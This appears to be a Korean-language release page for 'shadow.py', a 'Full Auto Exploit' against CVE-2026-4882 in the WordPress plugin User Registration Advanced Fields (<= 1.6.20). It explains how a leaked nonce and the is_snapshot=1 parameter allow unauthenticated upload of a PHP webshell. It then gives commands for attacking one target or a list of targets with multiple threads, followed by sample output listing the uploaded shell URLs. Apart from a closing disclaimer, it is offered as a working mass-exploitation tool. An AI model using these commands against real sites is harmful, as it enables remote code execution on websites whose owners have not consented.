
User Registration Advanced Fields <= 1.6.20 - 인증되지 않은 임의 파일 업로드
User Registration Advanced Fields <= 1.6.20 - 인증 없이 임의 파일 업로드
User Registration Advanced Fields <= 1.6.20 - 인증 없이 임의 파일 업로드
설명
WordPress용 User Registration Advanced Fields 플러그인(1.6.20 이하 버전)은 uraf_profile_picture_upload_method_upload AJAX 액션을 통해 인증되지 않은 임의 파일 업로드에 취약합니다. 이 플러그인은 등록 양식이 포함된 모든 페이지에서 wp_localize_script()를 통해 유효한 nonce를 노출하며, is_snapshot=1 파라미터를 사용하면 파일 확장자 검증을 완전히 우회합니다. 이를 통해 인증되지 않은 공격자는 임의 파일(예: GIF 이미지로 위장한 PHP 웹쉘)을 업로드할 수 있으며, 해당 파일은 wp-content/uploads/user_registration_uploads/temp-uploads/에 저장되어 완전한 원격 코드 실행(RCE)으로 이어집니다.
~ CVSS 점수: 9.8 (치명적)
~ 영향받는 버전: <= 1.6.20
단일 대상:
python3 shadow.py -u https://target.com -s shadow.php대량 대상:
python3 shadow.py -f targets.txt -s shadow.php -t 30대화형 모드:
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
소유하지 않았거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.